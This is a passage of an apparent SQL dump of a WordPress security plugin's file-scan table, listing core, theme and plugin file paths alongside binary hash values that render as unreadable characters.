gonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0����}=�Y]q�.','wp-includes/wp-includes/option.php',0,'�]�2�ZB0����','�]�2�ZB0����','����+�9*$��<��*G�T���:*N�j���','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),('0���`P�V��y\0�','wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',0,'�H\r\r�0�X/^�0R','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('0�%,�4�)Y8 P�R��','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php',0,'��7�f�W�՚7���','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('0�Bip�(���I5B�q','wp-content/themes/auberge/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڹ�#ǫ�MgG<��V\Z','D&��qPx�7���O�i��5VJ���X��J�g','',0,'?'),('0�Q/�M�L\'�Zî��','wp-content/themes/advance/inc/kirki/assets/js/controls/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A-�2��4���(�28�','�]�G�_3c����[���=�\Z�/�%1&','',0,'?'),('0���L�8OP���S̱','wp-content/themes/fastblog/no-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��dvrȟ]!1�t�','M�<� B1v�#6e%�x{Y�ɬH����S�4�','',0,'?'),('0����3��B^�','wp-content/themes/sg-window/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�ma���b䋹FJ�','�#��DOi�Bx�O4�<��G>������j٤�$','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ս$����6�\"�','��^h\'z�[��j���ӊ%\Z�pã��j.�S','',0,'?'),('0�541C��-�*=8','wp-content/themes/promote/js/welcome-page.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2<�D��o\\ൂ=��\Z','�\\��Lp��{\"�Ν����It-�#�{���|�','',0,'?'),('0�8�Zʭc[c���','wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',0,'���|�Ww�b>E��yJ','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('0�ň����}m�X9�q','wp-content/plugins/wp-cerber/assets/flags/zm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\|e�D�gk�^���','�yЩ&VUą;�}��D4E���3�)\\','',0,'?'),('0����I��\Z8�\'�x','wp-content/plugins/wp-cerber/assets/flags/tk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȕ��n��e�Y�T��','I��/�:���5s ;�#bi)��4k ����','',0,'?'),('0�i��LS� �q���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���%��K\Z��{�V','���k��^�qݵ;�e8�K���=AaЮM_���','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('1!� I��<Em#','wp-content/plugins/wp-cerber/assets/flags/ee.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��h�~�\rO�����','��R�Bᣛ�݇84ɐ6B����\0ȸ�:l-�IB','',0,'?'),('1� ĒY��Ҵ\r�','wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ዿa*.C��q�/N','�Iٖ��KJ\"�t�ϭ^�b_[#f�K�:O)g','',0,'?'),('1\"��0ؔT5�/�vA','wp-content/themes/advance/inc/kirki/assets/scss/controls/select.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���q(��\n���]�','�}5�~��EPUW�m��nq�:;D�B��:K��E','',0,'?'),('1�(�W�y�%��\0','wp-content/themes/showcase-lite/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7Vz=i�֎�����x','�8/E�^����S����\r6x����-��','',0,'?'),('1\r���2<X\'ė/tk','wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-media-uploader.php',0,' 3r7z��Vy�g �X��',' 3r7z��Vy�g �X��','Nٝ�cǐ�%�QQ�^�p���h�j:r���ӯ','',0,'?'),('1 x��!���Y�}L�','wp-includes/wp-includes/js/dist/date.js',0,'�W!j`(�YՌ�f�','�W!j`(�YՌ�f�','��2�&�;��F�7�A\nOM�X�����','',0,'?'),('1&R�2�8��Q-V�m','wp-content/themes/advance/js/halfparallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7F��W>Q\'=˔','0��\Z�`��R�4�۶�ޞيf�C��a','',0,'?'),('1,DdE�����M','wp-content/themes/Endolf/single.php',0,'��)�X����wv','��)�X����wv',' �?���M��?5�n�jv��=�����e','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('1.�g��\']�����w�','wp-includes/wp-includes/js/jquery/ui/mouse.js',0,'����IJi��\r���','����IJi��\r���','�P��<\n��+�q� ��NJ�+��s���b���','',0,'?'),('16��Y;�w͢��db3','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x��I�5؋M\Z��*','co�4�2�&�ߓl*�)6����S� �5��⊽4','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��a2P���KQ��i\"','����F�;L��_����-������-��N��x','',0,'?'),('1A����,\ns����v','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��)��ɾNS(�! 4Z','��/�[��f �nU���!79�8^94����M','',0,'?'),('1G�[��D��qW�t��','wp-content/plugins/wp-cerber/assets/flags/gy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��B��}��>_�','L�:�,���B[���aa<���w�*@������','',0,'?'),('1U|h�%����|���','wp-content/themes/hueman/parts/featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���h`�I�0J��5','��O6m6Dk[=�{ =�.�\Z_��� �\"~S','',0,'?'),('1ZC�(�I9�L���','wp-content/themes/promote/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N0�&@�k�?�Խ^G','��I�u�\0qO�L�E�NU��(�D�\0��k��','',0,'?'),('1^��BsCZU*��M�>','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/o�-�6��ѥ�p|','���dd�^�#QҒ\Z�#q�^�Ɠ�J�w�','',0,'?'),('1m�{��MA�i��','wp-content/themes/Yegor/page.php',0,'��ژthȴ���','��ژthȴ���','4Nˍ,��o�G�`r\Z��``A��� �? L','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~','',0,'?'),('1�3\r\rI��W��\\��','wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ov_J�ex�� V-\r','�߬a�#�1Ȫ���s�9��;�\0e�oH߉T��','',0,'?'),('1��K�Y�х?_�~���','wp-includes/wp-includes/l10n.php',0,'���(��C�h���#','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('1��s�}\'n��c�E��','wp-content/themes/mora/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Ʈo�LS��K��i��','�+v\Z�\0DN��F�KW9�`=[G��ۚ�R','',0,'?'),('1�7�F0ܩ��^ �l','wp-content/plugins/wp-cerber/admin/cerber-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��ေ�yHj�[��','Sʭ��7:Y:`�ǝ�p%��G�%����G�','',0,'?'),('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0�d�M~��\nfo�{','7�M<|\'x*~��%�\r?+�a(� �TjN�','',0,'?'),('1�Nh�\'|J+K+bd&','wp-content/themes/promote/js/unminified/jquery.sticky.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z8w�� �#��E:~H','���]7R`v�o�ol�G���s:�U���u������','',0,'?'),('1Ζ*&mj�v���ѓ^','wp-includes/wp-includes/css/wp-pointer.min.css',0,'1�U�Y�D�K�z�c','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('1����)ΪWx��v�','wp-content/themes/storeone/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�c�`r���x�','�}3�$��X�!:����:�3I��lkW','',0,'?'),('1БY���4I^p�','wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`q8�2�G<A9\ZQ�',']�T=�76uN&=8W<�%����','',0,'?'),('1�ŷ�s�>��ZR͡','wp-content/themes/newsmag/assets/vendors/sticky/jquery.sticky.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�T��N�=O���','�tat� �E��\\lBE�6���U_��C��B','',0,'?'),('1�ه�җ\"R���\"','wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�HO�N��Z,�L��T',',_��ּ �����+%��$G\rK��?�����','',0,'?'),('1ۭz�� ~t2b?[I�','wp-includes/wp-includes/media.php',0,'D��|��ߟa]IW�S�J','D��|��ߟa]IW�S�J','R�y��n�lq��侅��.�$�����%','',0,'?'),('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m� \'���A','iķ��z[����/\"� X���{�o��:��','',0,'?'),('1�U����W���P8?','wp-includes/wp-includes/class-wp-post.php',0,'�;@A��[�oh�́F�','�;@A��[�oh�́F�','Bms������AKE)(|-�c����ϡ�|��d','',0,'?'),('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('1�W2`9��ʕ\0�a','wp-content/themes/hueman/assets/front/js/lib/jquery.jplayer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J3.��H���E�UW D�','�I~�ZC�@��>��c\Z|;^,�mm�ʗY_�','',0,'?'),('1��#\'\0����ț�`','wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php',0,'��v>��#��!n�(','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s �15�','',0,'?'),('2J�y*�m����]W','wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�ۡ�v%�b�ֽ',':�*vU@��?6�d�\\��P�X�<I��','',0,'?'),('2��D@��JL�c�','wp-content/themes/capacious/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���p?e�f-�V','I#��sW�\Z�2����Х�H�eȼ��k�B�','',0,'?'),('2\0�S#���y�c �','wp-content/themes/capacious/inc/customizer/theme-function.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�@��A\n�x��x5','5��[�d�`_aJ��i;e3�?-�k�T[w�1','',0,'?'),('2��;F�\nڮ�7��O','wp-content/themes/maxbusiness/css/swiper.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F(טѰ?��#�|�','7+�x*2z\rTC{IS��w����l�嫲�)�q','',0,'?'),('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r��T��tu�','yA�y3�h�|�Г�L�����i=���>�j','',0,'?'),('2 �8u��p�y����','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php',0,'�ś�L�\\�Pڜ�U','�ś�L�\\�Pڜ�U','c>�5�o��������_�T9�L~;�e7�','',0,'?'),('2\'G����됳Z0�e�','wp-content/themes/advance/inc/kirki/assets/js/controls/number.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�)��j,�Y�dX�','��A�\r�B@�?X�����F*��Ѹ���','',0,'?'),('2(_�ѽ[��$Z�v','wp-content/themes/cactus/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��#d�^��i�⏣','Գ��a��CŃAP�P-l������Ku�K�d�','',0,'?'),('27��&#����`�4','wp-content/themes/cactus/template-parts/post/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z~�~z�]��lk��.','�\\�\'��n�#�A�Ԏ��~�@`(#O� �!�','',0,'?'),('2:�w��m*�.#u�R','wp-includes/wp-includes/blocks/embed/block.json',0,'�B���S�):\\l�ID�','�B���S�):\\l�ID�','��$Xn�{4��aV_`�M,sbݱ�\"�*3��','',0,'?'),('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9����\n)��Fu','4�WZ�!VH-~~`⟜�is�G�m@�7�n�','',0,'?'),('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܦ�j�ݪO�s+��.','xb���,\Zl��5�ao-���P�<qh0�V�%\\','',0,'?'),('2O�P��m�4�L��u','wp-content/themes/sg-window/inc/widget-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����B�i�^]O','�����s |7m�R��љ��o�yO��R6��}','',0,'?'),('2Y� ��oq&�Z���','wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����؉�� �m/J�~','�}�\r:�jg���E�˾V(]h�x��t','',0,'?'),('2rj�Y��3��V�d�','wp-content/themes/newsmag/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ihd���<�Xk�.sE','�j�\\Y��nٹ藻���/��P.ގ�\"','',0,'?'),('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('2�E���γŷ���','wp-content/plugins/wp-cerber/assets/flags/ps.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��P-�6@%','%�AD���E���P�Ǖ��|�u��Ć�C�!','',0,'?'),('2�Hȿ��_�?96','wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php',0,'\r�*�un�rdu�g���','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('2��mP�<�o�L�)','wp-content/themes/weblog/acmethemes/customizer/single-posts/single-post-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�o���b�d��I','JqݪD8�ug�F̝�9�$�F���k9��6C�x','',0,'?'),('2�|�(ủt��T��','wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K8ۨ��)','.�%�����]:/$zԢ��S�_�)kER��','',0,'?'),('2�X�����a�d�p','wp-content/themes/advance/js/unminified/jquery.sidr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�L6�ޡ��','��m����������Y�jX�[=N�>�^VnR�','',0,'?'),('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('2��c�z��}j$���g','wp-content/themes/spidermag/spidermag/admin/about-theme/spidermag-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/T7I̘�{�ȸ$�','�\0��Ԛ%��T��o�J�Ν���W����\\���','',0,'?'),('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��J�cW�&��Y�','i�+W�M�E4�\n�#S�-^�?�ݻ��,�9','',0,'?'),('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f��u���ן)','���Vb�p�O+ �N$�uw���}�h�\"�','',0,'?'),('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('3��J��c$�\Z+','wp-content/plugins/wordfence/js/date.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��P�ER�_�c�','��B=��0�dƩ\"B�tUc��^1�>�q&�','',0,'?'),('3 \\��i-3\'�vj��','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���=H�(!�-y�','�d��u�D�:}��LD�pX�Le¸|���\r�','',0,'?'),('3)e/`���/\r�Ph=','wp-content/plugins/wp-cerber/assets/flags/bf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��>��=��$�.��','�Ȋ:��h�.�n(xD⃪F\"{`iN�\0#��','',0,'?'),('3+z��.���6Q~]y[','wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�R?�\"�`�$�`','! �n��śU7B��5gr� 1�*;R�','',0,'?'),('3-�\'����*�.�%B','wp-includes/wp-includes/js/codemirror/esprima.js',0,'d_� �S��g��ٛ��','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('3C�V�Z�:w�\'G���','wp-includes/wp-includes/Requests/Exception/HTTP/431.php',0,'��s|b$��ѓ<��','��s|b$��ѓ<��','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('3Y�#��6r\n�Yp�$��','wordfence-waf.php',0,'L�G�i���Y�����','L�G�i���Y�����','~���*�Z-b0,��A?��>L���G�\"Z����','',0,'?'),('3fDr)�{��w�� #','wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}O�^�0tGG��Q','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('3g���W��Zf9�','wp-includes/wp-includes/cron.php',0,'$�B�돗��QG�z','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('3h���\"I+[��E','wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԓs� 5C�ɚ�b��LF','���ʿ�Iv�+>Y�h�b�F\\x��v�.wT','',0,'?'),('3k��oW�5 k[mq','wp-admin/includes/continents-cities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W_��T�ӰI�Y�֛','2ɟ��tb;6@\Zq\'��Q��H�j ��m���ѫ�','',0,'?'),('3n�Ú1\Z�����','wp-content/themes/sg-window/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��eĽ5�\n�{�ȗ','\\X��J4��|�(�4�8U}i�s\"���hs�C�','',0,'?'),('3p���\\�8�lD�q','wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('3p�DL���ﳲƔ��','wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js',0,'/a��Lru�4�\Z�','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('3z\'�O��v�J&�� ','wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=��p�5%�h$�*�','s�B`]��b��p�M���0�\\�s�w�D{����','',0,'?'),('3}̚�J<�\\hT�Z%','wp-content/themes/pine/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�t�o�|����\n�','��52���\'LdW���@.#��:��2B�#','',0,'?'),('3�S�#ǣ+Ke�\0Ⱦ','wp-content/plugins/wp-cerber/assets/flags/la.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3MU\'���\Zkr�c&��','[�lԬ�`�l !_���>�kwd�X��p���_','',0,'?'),('3��JΑTg�0��\'e','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4���uB\nE�#@��W',')r�xUYJ�;hpjH{\\����1\'#�� s�','',0,'?'),('3��!:����~���Bi','wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Bm Wp�b���','ҹ�)��K�<S������p���9_$+�','',0,'?'),('3�Z�mڊ�+���hx0','wp-content/themes/wp-barrister/library/images/icon-rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�<�\r�����eP\0Z','�p���bG�1���)L�ʩ-n�wn���T�','',0,'?'),('3�����`{%x��ˉ','wp-content/themes/storeone/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v�!x�����','>^��ڌ��m\"L���#�\ne�ҴC����r5�','',0,'?'),('3ہ�Н�hz�z�Pu','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A/����v��','CX��%�.�wC���TA6B<�\"w���c�5� l','',0,'?'),('3���\'���RK�Bf�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('3��fQ3�h�5[��W�<','wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('3���*�2�9��4(��','wp-content/themes/skt-pathway/content-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˕��2\r��X6Q�|J','ڰY\\t�䗡v��+����\n�/|��\"��','',0,'?'),('3��X�\'�F���)','wp-content/themes/hueman/assets/front/img/demo/11-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��i�\r�\nu2J\n^','�|�<��{ɶ���L �l�o�=y��R��','',0,'?'),('3��ng\0��\\\0 �W','wp-includes/IXR/class-IXR-value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),('4\n�� m�]Ŀ�Њ��','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�+e��[e�ϙ�fW�','QA��u&�{Ai��XP�K�[�{0�Q�k��','',0,'?'),('4�cvn�R��T�y7','wp-content/themes/hueman/assets/czr/js/czr-control.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B��9���mW��et','m���Y��YPK�n�j� \nG��$��t��(�� }','',0,'?'),('4�31@�*r�����8','wp-includes/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ś�L�\\�Pڜ�U','c>�5�o��������_�T9�L~;�e7�','',0,'?'),('4C\'�V�M�������','wp-content/themes/anima/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\"��kpN��ۇ��1','ߤ��e����%���%Q& �T��z���N���','',0,'?'),('48�Vt���+^X�','wp-includes/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','! /�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('49���� ���l�� ','wp-content/themes/anima/cryout/css/jquery-ui.structure.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ebv@���D�~','�Jnl�~Qh���/�K���#?o�|�[C��','',0,'?'),('4;`߯z�? �{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h»����$\ZPfX�','�ƪɝ����U[Z~��^�d�\'�X�ٮ���','',0,'?'),('4;��2������@y','wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',0,'cdxo&l�g�8�3��','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('4AI�n09��7c`','wp-includes/js/tinymce/utils/validate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CL�1?o+;���{Y�','k�H��;�\0�kC�s� \'K�#45+eE|���0','',0,'?'),('4K��Qޖ�R(�R','wp-content/themes/newsmag/inc/customizer/settings/general/controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�lnc����','��H��dK�8 O�az���<k6L��j�','',0,'?'),('4To���iE��t�','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�I�SD���D\Z.{','o�N�Wl����y�����]�����\'�����','',0,'?'),('4T몧�o�%�u���','wp-content/themes/skt-pathway/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����f*l���\n�','8!,Kmo�\r�1w�~5�/?e�)��B|�i','',0,'?'),('4V\Z�\nm��K�_6�u:','wp-content/themes/spidermag/template-parts/author-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ށK����_.-','��\Z��?kk:���P�p}k9t��dᦆS(@','',0,'?'),('4a�[I�}���H�m)','wp-admin/css/deprecated-media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M>��_�^�����9F','.��*�AU�u0� \'�Q�2˻�=�x4w��g�','',0,'?'),('4p;��r���N#�M','wp-content/themes/anima/resources/images/headers/laptop.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I���_�;�ba#�','��I�}����<T��Čći�(���L��o','',0,'?'),('4���9�7��Tb��~~','wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;0��#�B���n','ѹ�T)��f�-D�/kFb��y�����H�','',0,'?'),('4�&�J�nC��:�YN�','wp-content/themes/hueman/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�X�!�w�-j!m<0�','�3�-$2�,\'�.��#$nO��$`0��R�S�f','',0,'?'),('4������Kv 